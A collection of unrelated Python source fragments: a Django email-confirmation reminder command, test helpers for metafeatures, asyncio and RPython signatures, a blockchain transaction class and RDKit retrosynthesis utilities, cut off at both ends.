discard_before = datetime.datetime.now(tz=datetime.timezone.utc) - datetime.timedelta(days=options.get('days'))
for request in confirmation_request.filter(expires__lte=discard_before):
request.delete()
if confirmation_request.count() > 0:
print("Confirmation request pending for %s <%s>" % (account.user.username, account.user.email))
break
print("Sending confirmation email to %s <%s>" % (account.user.username, account.user.email))
confirmation_request = account.new_confirmation_request()
confirmation_url = "https://%s%s" % (site.domain, reverse('confirm-email', kwargs={'confirmation_key':confirmation_request.key}))
context = {
'confirmation': confirmation_request,
'confirmation_url': confirmation_url,
}
email_subject = 'Email confirmation reminder'
email_body_text = render_to_string('get_together/emails/users/confirm_email.txt', context)
email_body_html = render_to_string('get_together/emails/users/confirm_email.html', context)
email_recipients = [account.user.email]
email_from = getattr(settings, 'DEFAULT_FROM_EMAIL', '<EMAIL>')
success = send_mail(
subject=email_subject,
message=email_body_text,
from_email=email_from,
recipient_list=email_recipients,
html_message=email_body_html
)
EmailRecord.objects.create(
sender=None,
recipient=account.user,
email=account.user.email,
subject=email_subject,
body=email_body_text,
ok=success
)
time.sleep(0.1)
|
66612
|
import json
import os
import time
import numpy as np
from metalearn import Metafeatures
from tests.config import CORRECTNESS_SEED, METAFEATURES_DIR, METADATA_PATH
from .dataset import read_dataset
def get_dataset_metafeatures_path(dataset_filename):
dataset_name = dataset_filename.rsplit(".", 1)[0]
return os.path.join(METAFEATURES_DIR, dataset_name+"_mf.json")
def is_close(computed_value, known_value):
if type(known_value) is str:
correct = known_value == computed_value
else:
correct = np.array(np.isclose(known_value, computed_value, equal_nan=True)).all()
return correct
def compute_dataset_metafeatures():
metadata = json.load(open(METADATA_PATH, "r"))
for dataset_metadata in metadata:
dataset_filename = dataset_metadata["filename"]
choice = None
while not choice in ["y", "v", "n"]:
choice = input(dataset_filename + " [(y)es, (v)erbose, (n)o]: ")
if choice == "n":
continue
X, Y, column_types = read_dataset(dataset_metadata)
start_time = time.time()
computed_mfs = Metafeatures().compute(X=X, Y=Y, column_types=column_types, seed=CORRECTNESS_SEED)
run_time = time.time() - start_time
if choice == "v":
known_mf_path = get_dataset_metafeatures_path(dataset_filename)
with open(known_mf_path, 'r') as fp:
known_mfs = json.load(fp)
new_mfs = {}
deleted_mfs = {}
updated_mfs = {}
same_mfs = {}
all_mf_names = set(list(computed_mfs.keys()) + list(known_mfs.keys()))
for mf in all_mf_names:
if mf not in known_mfs.keys():
new_mfs[mf] = computed_mfs[mf]
elif mf not in computed_mfs.keys():
deleted_mfs[mf] = known_mfs[mf]
elif is_close(computed_mfs[mf]['value'], known_mfs[mf]['value']):
same_mfs[mf] = computed_mfs[mf]
else:
updated_mfs[mf] = {'known': known_mfs[mf], 'computed': computed_mfs[mf]}
print('UNCHANGED METAFEATURES')
print(json.dumps(same_mfs, sort_keys=True, indent=4))
print('DELETED METAFEATURES')
print(json.dumps(deleted_mfs, sort_keys=True, indent=4))
print('NEW METAFEATURES')
print(json.dumps(new_mfs, sort_keys=True, indent=4))
print('UPDATED METAFEATURES')
print(json.dumps(updated_mfs, sort_keys=True, indent=4))
print("Runtime: " + str(run_time))
choice = None
while not choice in ["y", "n"]:
choice = input(f"Update {dataset_filename} metafeatures? [(y)es, (n)o]: ")
if choice == "y":
mf_file_path = get_dataset_metafeatures_path(dataset_filename)
with open(mf_file_path, 'w') as fp:
json.dump(computed_mfs, fp, sort_keys=True, indent=4)
|
66656
|
import rlp
from rlp.sedes import CountableList, text # big_endian_int
from kademlia.utils import digest
from utils import get_sender
import json
import logging
from exceptions import InvalidTransaction
import Globals
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger(__name__)
tx_fields = ('sender_pk', 'nonce', 'data', 'timestamp', 'signatures', 'validators')
class FitchainTx(rlp.Serializable):
fields = [
('model_id', text),
('accuracy', text),
('error', text),
('roc', text),
('auc', text),
]
class Transaction(rlp.Serializable):
fields = [
('sender_pk', text),
('nonce', text),
('data', text),
('timestamp', text),
('signatures', CountableList(text)),
('validators', CountableList(text)),
]
def serialize(self):
return 'sender_pk:' + self.sender_pk + ' nonce:' + self.nonce
def __load_data__(self):
""" Load body of this transaction to generate digest """
data = self.sender_pk + self.nonce + self.data + self.timestamp + self.get_validators()
return data
@property
def body(self):
return self.__load_data__()
@property
def hash(self):
""" Return the digest of the unsigned transaction """
return digest(self.__load_data__())
def get_validators(self)->str:
"""
Serialize and stringify list of validators for this transaction
Return list of validators as a string
"""
v_str = []
for v in self.validators:
if isinstance(v, str):
v_str.append(v)
else:
v_str.append(v.decode())
return ''.join(v_str)
@property
def sender(self):
return self.sender_pk
@property
def signers(self):
data = self.__load_data__()
signers = []
for s in self.signatures:
signer = get_sender(s, data)
signers.append(signer)
return signers
def is_superior(self, transaction):
"""
Return true if new transaction has more signatures
than old transaction
"""
return len(self.signatures) > len(transaction['signatures'])
def build_transaction(raw_data: list)->Transaction:
sender_pk = raw_data[0].decode()
nonce = raw_data[1].decode()
data = raw_data[2].decode()
timestamp = raw_data[3].decode()
signatures = [s.decode() for s in raw_data[4]]
validators = [v.decode() for v in raw_data[5]]
return Transaction(sender_pk, nonce, data, timestamp, signatures, validators)
def decode_value(value: bytes, fields=['sender', 'nonce', 'data', 'timestamp'])->dict:
""" Extract fields from byte-stored chunks """
ev = json.loads(value)
body = ''.join([ev[f] for f in fields])
es = ev['signatures'] # existing signatures
return {'body': body, 'signatures': es}
def encode_value(data: dict, sender: str, nonce: str, timestamp: str, signatures: dict):
tx = {}
data_str = json.dumps(data)
tx['data'] = data_str
tx['sender'] = sender
tx['nonce'] = nonce
tx['timestamp'] = timestamp
tx['signatures'] = json.dumps(signatures)
body = sender + nonce + data_str + timestamp
tx['hash'] = digest(body).hex()
return tx
class FitchainTransaction:
def __init__(self, tx: dict):
self.tx = tx
self.valid = False
self.valid_tx_fields = ['data', 'signatures', 'nonce', 'timestamp', 'sender', 'hash']
self.valid_data_fields = ['model_id', 'accuracy', 'error', 'eot']
# check validity and fill fields
self._is_valid()
def _is_valid(self):
""" Process transactions for the fitchain gossiper game """
log.debug("Checking transaction validity")
for v in self.valid_tx_fields:
if v not in self.tx:
return False
# raise InvalidTransaction
# load signatures of this transaction
sigs = json.loads(self.tx['signatures'])
if not isinstance(sigs, dict):
raise InvalidTransaction
data = json.loads(self.tx['data'])
for v in self.valid_data_fields:
if v not in data:
return False # raise InvalidTransaction
# retrieve text fields
nonce = self.tx['nonce']
sender = self.tx['sender']
timestamp = self.tx['timestamp']
# TODO check that this content is matching
self.body = sender + nonce + self.tx['data'] + timestamp
body_hash = digest(self.body).hex()
if body_hash != self.tx['hash']:
return False #raise InvalidTransaction
# check attached signatures (even if they have been checked already)
for sender in sigs:
pubkey = bytes.fromhex(sender)
sig = bytes.fromhex(sigs[sender])
message = self.body.encode()
verified = Globals.account.verify_sig_msg(message, sig, pubkey)
if not verified:
log.warning('Signature %s from %s is not valid', sig, sender)
return False
# valid transaction
self.valid = True
# return self.valid
def get_signatures(self):
if self.valid:
return json.loads(self.tx['signatures'])
def get_body(self):
if self.valid:
return self.body
|
66705
|
import asyncio
import sys
import unittest
import nest_asyncio
def exception_handler(loop, context):
print('Exception:', context)
class NestTest(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
nest_asyncio.apply(self.loop)
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.set_exception_handler(exception_handler)
def tearDown(self):
self.assertIsNone(asyncio._get_running_loop())
self.loop.close()
del self.loop
async def coro(self):
await asyncio.sleep(0.01)
return 42
def test_nesting(self):
async def f1():
result = self.loop.run_until_complete(self.coro())
self.assertEqual(result, await self.coro())
return result
async def f2():
result = self.loop.run_until_complete(f1())
self.assertEqual(result, await f1())
return result
result = self.loop.run_until_complete(f2())
self.assertEqual(result, 42)
def test_ensure_future_with_run_until_complete(self):
async def f():
task = asyncio.ensure_future(self.coro())
return self.loop.run_until_complete(task)
result = self.loop.run_until_complete(f())
self.assertEqual(result, 42)
def test_ensure_future_with_run_until_complete_with_wait(self):
async def f():
task = asyncio.ensure_future(self.coro())
done, pending = self.loop.run_until_complete(
asyncio.wait([task], return_when=asyncio.ALL_COMPLETED))
task = done.pop()
return task.result()
result = self.loop.run_until_complete(f())
self.assertEqual(result, 42)
def test_timeout(self):
async def f1():
await asyncio.sleep(0.1)
async def f2():
asyncio.run(asyncio.wait_for(f1(), 0.01))
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(f2())
def test_two_run_until_completes_in_one_outer_loop(self):
async def f1():
self.loop.run_until_complete(asyncio.sleep(0.02))
return 4
async def f2():
self.loop.run_until_complete(asyncio.sleep(0.01))
return 2
result = self.loop.run_until_complete(
asyncio.gather(f1(), f2()))
self.assertEqual(result, [4, 2])
@unittest.skipIf(sys.version_info < (3, 7, 0), 'No contextvars module')
def test_contextvars(self):
from contextvars import ContextVar
var = ContextVar('var')
var.set(0)
async def set_val():
var.set(42)
async def coro():
await set_val()
await asyncio.sleep(0.01)
return var.get()
result = self.loop.run_until_complete(coro())
self.assertEqual(result, 42)
if __name__ == '__main__':
unittest.main()
|
66721
|
import json
import functools
from django.conf import settings
from django.test import Client, TestCase
__all__ = ['JsonTestClient', 'JsonTestMixin', 'JsonTestCase']
class JsonTestClient(Client):
def _json_request(self, method, url, data=None, *args, **kwargs):
method_func = getattr(super(JsonTestClient, self), method)
if method == 'get':
encode = lambda x: x
else:
encode = json.dumps
if data is not None:
resp = method_func(url, encode(data), content_type='application/json', *args, **kwargs)
else:
resp = method_func(url, content_type='application/json', *args, **kwargs)
if resp.get('Content-Type', '').startswith('application/json') and resp.content:
charset = resp.charset if hasattr(resp, 'charset') else settings.DEFAULT_CHARSET
resp.json = json.loads(resp.content.decode(charset))
return resp
def __getattribute__(self, attr):
if attr in ('get', 'post', 'put', 'delete', 'trace', 'head', 'patch', 'options'):
return functools.partial(self._json_request, attr)
else:
return super(JsonTestClient, self).__getattribute__(attr)
class JsonTestMixin(object):
client_class = JsonTestClient
class JsonTestCase(JsonTestMixin, TestCase):
pass
|
66729
|
import py
from rpython.rlib.signature import signature, finishsigs, FieldSpec, ClassSpec
from rpython.rlib import types
from rpython.annotator import model
from rpython.rtyper.llannotation import SomePtr
from rpython.annotator.signature import SignatureError
from rpython.translator.translator import TranslationContext, graphof
from rpython.rtyper.lltypesystem import rstr
from rpython.rtyper.annlowlevel import LowLevelAnnotatorPolicy
def annotate_at(f, policy=None):
t = TranslationContext()
t.config.translation.check_str_without_nul = True
a = t.buildannotator(policy=policy)
a.annotate_helper(f, [model.s_ImpossibleValue]*f.__code__.co_argcount, policy=policy)
return a
def sigof(a, f):
# returns [param1, param2, ..., ret]
g = graphof(a.translator, f)
return [a.binding(v) for v in g.startblock.inputargs] + [a.binding(g.getreturnvar())]
def getsig(f, policy=None):
a = annotate_at(f, policy=policy)
return sigof(a, f)
def check_annotator_fails(caller):
exc = py.test.raises(model.AnnotatorError, annotate_at, caller).value
assert caller.__name__ in str(exc)
def test_bookkeeping():
@signature('x', 'y', returns='z')
def f(a, b):
return a + len(b)
f.foo = 'foo'
assert f._signature_ == (('x', 'y'), 'z')
assert f.__name__ == 'f'
assert f.foo == 'foo'
assert f(1, 'hello') == 6
def test_basic():
@signature(types.int(), types.str(), returns=types.char())
def f(a, b):
return b[a]
assert getsig(f) == [model.SomeInteger(), model.SomeString(), model.SomeChar()]
def test_arg_errors():
@signature(types.int(), types.str(), returns=types.int())
def f(a, b):
return a + len(b)
@check_annotator_fails
def ok_for_body(): # would give no error without signature
f(2.0, 'b')
@check_annotator_fails
def bad_for_body(): # would give error inside 'f' body, instead errors at call
f('a', 'b')
def test_return():
@signature(returns=types.str())
def f():
return 'a'
assert getsig(f) == [model.SomeString()]
@signature(types.str(), returns=types.str())
def f(x):
return x
def g():
return f('a')
a = annotate_at(g)
assert sigof(a, f) == [model.SomeString(), model.SomeString()]
def test_return_errors():
@check_annotator_fails
@signature(returns=types.int())
def int_not_char():
return 'a'
@check_annotator_fails
@signature(types.str(), returns=types.int())
def str_to_int(s):
return s
@signature(returns=types.str())
def str_not_None():
return None
@check_annotator_fails
def caller_of_str_not_None():
return str_not_None()
@py.test.mark.xfail
def test_return_errors_xfail():
@check_annotator_fails
@signature(returns=types.str())
def str_not_None():
return None
def test_none():
@signature(returns=types.none())
def f():
pass
assert getsig(f) == [model.s_None]
def test_float():
@signature(types.longfloat(), types.singlefloat(), returns=types.float())
def f(a, b):
return 3.0
assert getsig(f) == [model.SomeLongFloat(), model.SomeSingleFloat(), model.SomeFloat()]
def test_unicode():
@signature(types.unicode(), returns=types.int())
def f(u):
return len(u)
assert getsig(f) == [model.SomeUnicodeString(), model.SomeInteger()]
def test_str0():
@signature(types.unicode0(), returns=types.str0())
def f(u):
return 'str'
assert getsig(f) == [model.SomeUnicodeString(no_nul=True),
model.SomeString(no_nul=True)]
def test_ptr():
policy = LowLevelAnnotatorPolicy()
@signature(types.ptr(rstr.STR), returns=types.none())
def f(buf):
pass
argtype = getsig(f, policy=policy)[0]
assert isinstance(argtype, SomePtr)
assert argtype.ll_ptrtype.TO == rstr.STR
def g():
f(rstr.mallocstr(10))
getsig(g, policy=policy)
def test_list():
@signature(types.list(types.int()), returns=types.int())
def f(a):
return len(a)
argtype = getsig(f)[0]
assert isinstance(argtype, model.SomeList)
item = argtype.listdef.listitem
assert item.s_value == model.SomeInteger()
assert item.resized == True
@check_annotator_fails
def ok_for_body():
f(['a'])
@check_annotator_fails
def bad_for_body():
f('a')
@signature(returns=types.list(types.char()))
def ff():
return ['a']
@check_annotator_fails
def mutate_broader():
ff()[0] = 'abc'
@check_annotator_fails
def mutate_unrelated():
ff()[0] = 1
@check_annotator_fails
@signature(types.list(types.char()), returns=types.int())
def mutate_in_body(l):
l[0] = 'abc'
return len(l)
def can_append():
l = ff()
l.append('b')
getsig(can_append)
def test_array():
@signature(returns=types.array(types.int()))
def f():
return [1]
rettype = getsig(f)[0]
assert isinstance(rettype, model.SomeList)
item = rettype.listdef.listitem
assert item.s_value == model.SomeInteger()
assert item.resized == False
def try_append():
l = f()
l.append(2)
check_annotator_fails(try_append)
def test_dict():
@signature(returns=types.dict(types.str(), types.int()))
def f():
return {'a': 1, 'b': 2}
rettype = getsig(f)[0]
assert isinstance(rettype, model.SomeDict)
assert rettype.dictdef.dictkey.s_value == model.SomeString()
assert rettype.dictdef.dictvalue.s_value == model.SomeInteger()
def test_instance():
class C1(object):
pass
class C2(C1):
pass
class C3(C2):
pass
@signature(types.instance(C3), returns=types.instance(C2))
def f(x):
assert isinstance(x, C2)
return x
argtype, rettype = getsig(f)
assert isinstance(argtype, model.SomeInstance)
assert argtype.classdef.classdesc.pyobj == C3
assert isinstance(rettype, model.SomeInstance)
assert rettype.classdef.classdesc.pyobj == C2
@check_annotator_fails
def ok_for_body():
f(C2())
@check_annotator_fails
def bad_for_body():
f(C1())
@check_annotator_fails
def ok_for_body():
f(None)
def test_instance_or_none():
class C1(object):
pass
class C2(C1):
pass
class C3(C2):
pass
@signature(types.instance(C3, can_be_None=True), returns=types.instance(C2, can_be_None=True))
def f(x):
assert isinstance(x, C2) or x is None
return x
argtype, rettype = getsig(f)
assert isinstance(argtype, model.SomeInstance)
assert argtype.classdef.classdesc.pyobj == C3
assert argtype.can_be_None
assert isinstance(rettype, model.SomeInstance)
assert rettype.classdef.classdesc.pyobj == C2
assert rettype.can_be_None
@check_annotator_fails
def ok_for_body():
f(C2())
@check_annotator_fails
def bad_for_body():
f(C1())
def test_self():
@finishsigs
class C(object):
@signature(types.self(), types.self(), returns=types.none())
def f(self, other):
pass
class D1(C):
pass
class D2(C):
pass
def g():
D1().f(D2())
a = annotate_at(g)
argtype = sigof(a, C.__dict__['f'])[0]
assert isinstance(argtype, model.SomeInstance)
assert argtype.classdef.classdesc.pyobj == C
def test_self_error():
class C(object):
@signature(types.self(), returns=types.none())
def incomplete_sig_meth(self):
pass
exc = py.test.raises(SignatureError, annotate_at, C.incomplete_sig_meth).value
assert 'incomplete_sig_meth' in str(exc)
assert 'finishsigs' in str(exc)
def test_any_as_argument():
@signature(types.any(), types.int(), returns=types.float())
def f(x, y):
return x + y
@signature(types.int(), returns=types.float())
def g(x):
return f(x, x)
sig = getsig(g)
assert sig == [model.SomeInteger(), model.SomeFloat()]
@signature(types.float(), returns=types.float())
def g(x):
return f(x, 4)
sig = getsig(g)
assert sig == [model.SomeFloat(), model.SomeFloat()]
@signature(types.str(), returns=types.int())
def cannot_add_string(x):
return f(x, 2)
exc = py.test.raises(model.AnnotatorError, annotate_at, cannot_add_string).value
assert 'Blocked block' in str(exc)
def test_return_any():
@signature(types.int(), returns=types.any())
def f(x):
return x
sig = getsig(f)
assert sig == [model.SomeInteger(), model.SomeInteger()]
@signature(types.str(), returns=types.any())
def cannot_add_string(x):
return f(3) + x
exc = py.test.raises(model.AnnotatorError, annotate_at, cannot_add_string).value
assert 'Blocked block' in str(exc)
assert 'cannot_add_string' in str(exc)
@py.test.mark.xfail
def test_class_basic():
class C(object):
_fields_ = ClassSpec({'x': FieldSpec(types.int)})
def wrong_type():
c = C()
c.x = 'a'
check_annotator_fails(wrong_type)
def bad_field():
c = C()
c.y = 3
check_annotator_fails(bad_field)
@py.test.mark.xfail
def test_class_shorthand():
class C1(object):
_fields_ = {'x': FieldSpec(types.int)}
def wrong_type_1():
c = C1()
c.x = 'a'
check_annotator_fails(wrong_type_1)
class C2(object):
_fields_ = ClassSpec({'x': types.int})
def wrong_type_2():
c = C2()
c.x = 'a'
check_annotator_fails(wrong_type_1)
@py.test.mark.xfail
def test_class_inherit():
class C(object):
_fields_ = ClassSpec({'x': FieldSpec(types.int)})
class C1(object):
_fields_ = ClassSpec({'y': FieldSpec(types.int)})
class C2(object):
_fields_ = ClassSpec({'y': FieldSpec(types.int)}, inherit=True)
def no_inherit():
c = C1()
c.x = 3
check_annotator_fails(no_inherit)
def good():
c = C2()
c.x = 3
annotate_at(good)
def wrong_type():
c = C2()
c.x = 'a'
check_annotator_fails(wrong_type)
|
66732
|
import copy
from functools import wraps, reduce
import socket
import os
from operator import mul
import sys
from statistics import mean
import time
import numpy as np
from rdkit.Chem import AllChem, RWMol
from rdkit import Chem
from rdkit.Chem.rdChemReactions import ChemicalReaction
from kgcn.data_util import dense_to_sparse
from kgcn.preprocessing.utils import atom_features
from model_modules import predict_templates
class MoleculeUtils:
@staticmethod
def generate_ecfp(mol, radius=2, bits=2048):
""" Create Extended Connectivity FingerPrint
Args:
mol (Mol Object):
radius (int):
bits (int):
Returns:
Numpy array type ECFP
"""
fp = AllChem.GetMorganFingerprintAsBitVect(mol, radius, nBits=bits).ToBitString()
return np.asarray([[int(i) for i in list(fp)]])
@staticmethod
def generate_gcn_descriptor(mol, atom_num_limit, label_dim):
""" Create GCN descriptor (adj, feat, label)
Args:
mol (Mol Object):
atom_num_limit (int):
label_dim (int):
Returns:
adj, feature, label
"""
# Prepare dummy label information
label_data = np.zeros(label_dim)
label_mask = np.zeros_like(label_data)
label_mask[~np.isnan(label_data)] = 1
# for index, mol in enumerate(mol):
Chem.SanitizeMol(mol, sanitizeOps=Chem.SANITIZE_ADJUSTHS)
# Create a adjacency matrix
mol_adj = Chem.GetAdjacencyMatrix(mol)
row_num = len(mol_adj)
adj = np.array(mol_adj, dtype=np.int)
# Set diagonal elements to 1, fill others with the adjacency matrix from RDkit
for i in range(row_num):
adj[i][i] = int(1)
# Create a feature matrix
feature = [atom_features(atom, degree_dim=17) for atom in mol.GetAtoms()]
for _ in range(atom_num_limit - len(feature)):
feature.append(np.zeros(len(feature[0]), dtype=np.int))
adj = dense_to_sparse(adj)
adj[2][:] = atom_num_limit
obj = {
"feature": np.asarray([feature]),
"adj": np.asarray([adj]),
"label": np.asarray([label_data]),
"mask_label": np.asarray([label_mask]),
"max_node_num": atom_num_limit
}
return obj
@staticmethod
def update_mol_condition(mol_conditions, mols, divided_mols, start_materials, idx):
""" Update the molecule condition if the molecules in start materials
Args:
mol_conditions (list[int]):
mols (list[Mol Object]):
divided_mols (list[Mol Object]):
start_materials (set[str]):
idx (int):
Returns:
"1" if the molecule is in start materials otherwise "0"
"""
mols.pop(idx)
mol_conditions.pop(idx)
for divided_mol in divided_mols:
mols.append(divided_mol)
smiles = Chem.MolToSmiles(divided_mol, canonical=True)
if SearchUtils.sequential_search(smiles, start_materials):
mol_conditions.append(1)
else:
mol_conditions.append(0)
@staticmethod
def get_unsolved_mol_condition_idx(mol_conditions):
""" Get indexes of mol_conditions whose condition is 0
Args:
mol_conditions (list[int]):
Returns:
"""
unsolved_idxs = []
for i in range(len(mol_conditions)):
if mol_conditions[i] == 0:
unsolved_idxs.append(i)
return unsolved_idxs
@staticmethod
def is_valid(mol):
""" Check whether Mol Object is valid
Args:
mol (list[Mol Object]):
Returns:
True if mol is valid otherwise False
"""
flag = Chem.SanitizeMol(mol, catchErrors=True)
return True if flag == Chem.SANITIZE_NONE else False
class ReactionUtils:
"""
Attributes:
mol (Mol Object):
"""
mol = None
rxn_candidates = []
sorted_rxn_prob_list = None
sorted_rxn_prob_idxs = None
def __init__(self, mol):
""" A constructor of ReactionUtils
Args:
mol (Mol Object):
"""
self.mol = mol
@staticmethod
def react_product_to_reactants(product, rxn_rule, gateway=None):
"""
Args:
product (Mol Object):
rxn_rule (Chemical Reaction):
gateway (JavaGateway):
Returns:
list(molecule object)
"""
return_list = []
if gateway:
product = Chem.MolToSmiles(product)
try:
reactants_list = gateway.entry_point.reactProductToReactants(product, rxn_rule)
for reactants in reactants_list:
if reactants is None or None in reactants:
continue
reactants = [Chem.MolFromSmiles(m) for m in reactants]
if reactants and None not in reactants:
return_list.append(reactants)
return return_list if return_list else None
except:
return None
if ChemicalReaction.Validate(rxn_rule)[1] == 1 or rxn_rule.GetNumReactantTemplates() != 1:
return None
reactants_list = rxn_rule.RunReactants([product, ])
if not reactants_list:
return None
for reactants in reactants_list:
for reactant in reactants:
if not MoleculeUtils.is_valid(reactant):
continue
return_list.append(reactants)
return return_list if return_list else None
def set_reaction_candidates_and_probabilities(self, model, rxn_rules, model_name, config):
"""
Args:
model: Tensorflow model or Keras model instance
rxn_rules (list[Chemical Reaction]):
model_name (str):
config (dict):
"""
if config['descriptor'] == 'ECFP':
input_mol = MoleculeUtils.generate_ecfp(self.mol)
rxn_prob_list = predict_templates(model, input_mol, model_name, config)
elif config['descriptor'] == 'GCN':
input_mol = None
if model_name == 'expansion':
input_mol = MoleculeUtils.generate_gcn_descriptor(self.mol, config['max_atom_num'], len(rxn_rules))
elif model_name == 'rollout':
input_mol = MoleculeUtils.generate_gcn_descriptor(self.mol, config['max_atom_num'], len(rxn_rules))
rxn_prob_list = predict_templates(model, input_mol, model_name, config)
else:
print("[ERROR] Set 'descriptor' to ECFP or GCN")
sys.exit(1)
self.sorted_rxn_prob_idxs = np.argsort(-rxn_prob_list)
self.sorted_rxn_prob_list = rxn_prob_list[self.sorted_rxn_prob_idxs]
self.rxn_candidates = self.get_reaction_candidates(rxn_rules, config["expansion_num"])
@staticmethod
def get_reactions(rxn_rule_path, save_dir, use_reaction_complement=False):
def complement_reaction(rxn_template):
if rxn_template.GetNumProductTemplates() != 1:
print("[ERROR] A reaction template has only one product template.")
sys.exit(1)
pro = rxn_template.GetProductTemplate(0)
rw_pro = RWMol(pro)
amaps_pro = {a.GetAtomMapNum() for a in pro.GetAtoms()}
amaps_rcts = {a.GetAtomMapNum() for rct in rxn_template.GetReactants() for a in rct.GetAtoms()}
amaps_not_in_rcts = amaps_pro.intersection(amaps_rcts)
for amap in amaps_not_in_rcts:
aidx = [a.GetIdx() for a in rw_pro.GetAtoms() if a.GetAtomMapNum() == amap][0]
rw_pro.RemoveAtom(aidx)
m = rw_pro.GetMol()
if '.' in Chem.MolToSmarts(m):
return
if (m.GetNumAtoms() == 0) or (m.GetNumAtoms() == 1 and m.GetAtomWithIdx(0).GetSymbol() in {"*", None}):
return
rxn_template.AddReactantTemplate(m)
with open(rxn_rule_path, 'r') as f:
lines = [l.strip('\n') for l in f.readlines()]
if use_reaction_complement:
rxn_templates = []
for l in lines:
try:
rxn_templates.append(AllChem.ReactionFromSmarts(l))
except Exception as e:
rxn_templates.append(l)
for rxn_template in rxn_templates:
if type(rxn_template) == ChemicalReaction:
complement_reaction(rxn_template)
out_reactions = [AllChem.ReactionToSmarts(rt) if type(rt) == ChemicalReaction else rt for rt in rxn_templates]
basename, ext = os.path.splitext(os.path.basename(rxn_rule_path))
with open(os.path.join(save_dir, f"{basename}_complemented{ext}"), 'w') as f:
f.writelines('\n'.join(out_reactions))
return out_reactions
else:
return lines
@staticmethod
def get_reverse_reactions(rxn_rule_path):
"""
Args:
rxn_rule_path (str):
Returns:
list[RxnMolecule]
"""
with open(rxn_rule_path, 'r') as f:
lines = f.readlines()
split_rxn_rules = [l.strip().split('>>') for l in lines]
reverse_rxn_str = ['>>'.join(split_rxn_rule[::-1]) for split_rxn_rule in split_rxn_rules]
return [AllChem.ReactionFromSmarts(r) for r in reverse_rxn_str]
def get_reaction_candidates(self, rxn_rules, expansion_num, top_number=None):
"""
Args:
rxn_rules (list[Chemical Reaction]):
expansion_num (int):
top_number (int):
Returns:
"""
idxs = []
probs = []
if top_number is None: # for expansion
for i in range(len(self.sorted_rxn_prob_idxs)):
probs.append(self.sorted_rxn_prob_list[i])
idxs.append(self.sorted_rxn_prob_idxs[i])
if i+1 >= expansion_num:
break
rxn_cands = [rxn_rules[i] for i in idxs]
self.sorted_rxn_prob_list = probs
return rxn_cands
else: # for rollout
idxs = [self.sorted_rxn_prob_idxs[i] for i in range(top_number)]
rxn_cands = [rxn_rules[i] for i in idxs]
return rxn_cands
@staticmethod
def predict_reactions(rxn_rules, model, mol, model_name, config, top_number=None):
"""
Args:
rxn_rules (list[Chemical Reaction]):
model: Tensorflow model or Keras model instance
mol (Molecule):
model_name (str):
config (dict):
top_number (int): if not None, get top-N prediction values
Returns:
Lists of predicted Chemical Reaction(s) and reaction probabilities
"""
rxn = ReactionUtils(mol)
rxn.set_reaction_candidates_and_probabilities(model, rxn_rules, model_name, config)
if top_number is None:
return rxn.get_reaction_candidates(rxn_rules, config["expansion_num"]), rxn.sorted_rxn_prob_list
else:
return rxn.get_reaction_candidates(rxn_rules, config["expansion_num"], top_number), rxn.sorted_rxn_prob_list
class SearchUtils:
@staticmethod
def sequential_search(mol, start_materials):
"""
Args:
mol (str):
start_materials (set[str]):
Returns:
Boolean
"""
return True if mol in start_materials else False
@staticmethod
def is_proved(mol_conditions):
"""
Args:
mol_conditions (list[int]):
Returns:
"""
return all([i == 1 for i in mol_conditions])
@staticmethod
def is_terminal(mols, gateway=None):
"""
Args:
mols (list[Mol Object]):
gateway (JavaGateway):
Returns:
"""
str_mols = [Chem.MolToSmiles(m) for m in mols]
return gateway.entry_point.isTerminal(str_mols)
@staticmethod
def is_loop_route(mols, node):
""" Check whether a molecule is in a route.
Args:
mols (list[Mol Object]):
node (Node):
Returns:
True if a molecule is in a route otherwise False
"""
mols = [Chem.MolToSmiles(m) for m in mols]
while node is not None:
unresolved_mols = set(node.state.mols[i] for i, c in enumerate(node.state.mol_conditions) if c == 0)
unresolved_mols = [Chem.MolToSmiles(m) for m in unresolved_mols]
for m in mols:
if m in unresolved_mols:
return True
node = node.parent_node
return False
def timeit(func):
@wraps(func)
def wrapper(*args, **kargs):
print("[INFO] start")
start = time.time()
result = func(*args, **kargs)
elapsed_time = time.time() - start
print(f"[INFO] done in {elapsed_time:5f} s")
return result
return wrapper
def calculate_cdscore(product, reactants):
"""
Args:
product (Mol object):
reactants (list(Mol object)):
Returns:
score (float)
return 1 if a molecule was divided evenly otherwise 0 <= x < 1.
"""
if len(reactants) == 1:
return 0.
pro_atom_num = product.GetNumAtoms()
rct_atom_nums = [m.GetNumAtoms() for m in reactants]
scale_factor = pro_atom_num / len(rct_atom_nums)
abs_errors = [abs(r - scale_factor) for r in rct_atom_nums]
return 1 / (1 + mean(abs_errors))
def calculate_asscore(mol_condition_before, mol_condition_after, num_divided_mols):
"""
Args:
mol_condition_before (list):
mol_condition_after (list):
num_divided_mols (int):
Returns:
return 1 if all divided molecules were starting materials otherwise 0 =< x < 1.
"""
if num_divided_mols == 1:
return 0.
return (mol_condition_after.count(1) - mol_condition_before.count(1)) / num_divided_mols
def calculate_rdscore(product, reactants):
"""
Args:
product (Mol object):
reactants (list(Mol object)):
Returns:
score (float)
return 1 if a number of rings in a product is reduced otherwise 0.
"""
try:
pro_ring_num = product.GetRingInfo().NumRings()
except Exception as e:
product.UpdatePropertyCache()
Chem.GetSymmSSSR(product)
pro_ring_num = product.GetRingInfo().NumRings()
rct_ring_nums = sum([m.GetRingInfo().NumRings() for m in reactants])
rdscore = pro_ring_num - rct_ring_nums
return 1. if rdscore > 0 else 0.
def calculate_stscore(reactants, reaction_template):
"""
Args:
reactants (list(Mol object)):
reaction_template (str):
Returns:
score (float)
return 1 if each reactant has a respective substructure in reaction template otherwise 1 / number of the combination.
"""
patts_for_rct = [Chem.MolFromSmarts(patt) for patt in reaction_template.split(">>")[0].split(".")]
match_patts = []
for rct, patt in zip(reactants, patts_for_rct):
match_patts.append(len(rct.GetSubstructMatches(patt, useChirality=True)))
match_patts = [1 if patt == 0 else patt for patt in match_patts]
return 1 / reduce(mul, match_patts)
def is_port_in_used(port):
"""
Args:
port (int):
Returns:
return True if the port is in used otherwise False
"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
return s.connect_ex(("localhost", port)) == 0
def get_default_config():
"""
Returns:
return config dict
"""
config = {
"max_atom_num": 50,
"search_count": 100,
"rollout_depth": 5,
"expansion_model": "model/model.sample.ckpt",
"expansion_rules": "data/sample_reaction_rule.csv",
"rollout_model": "model/model.sample.ckpt",
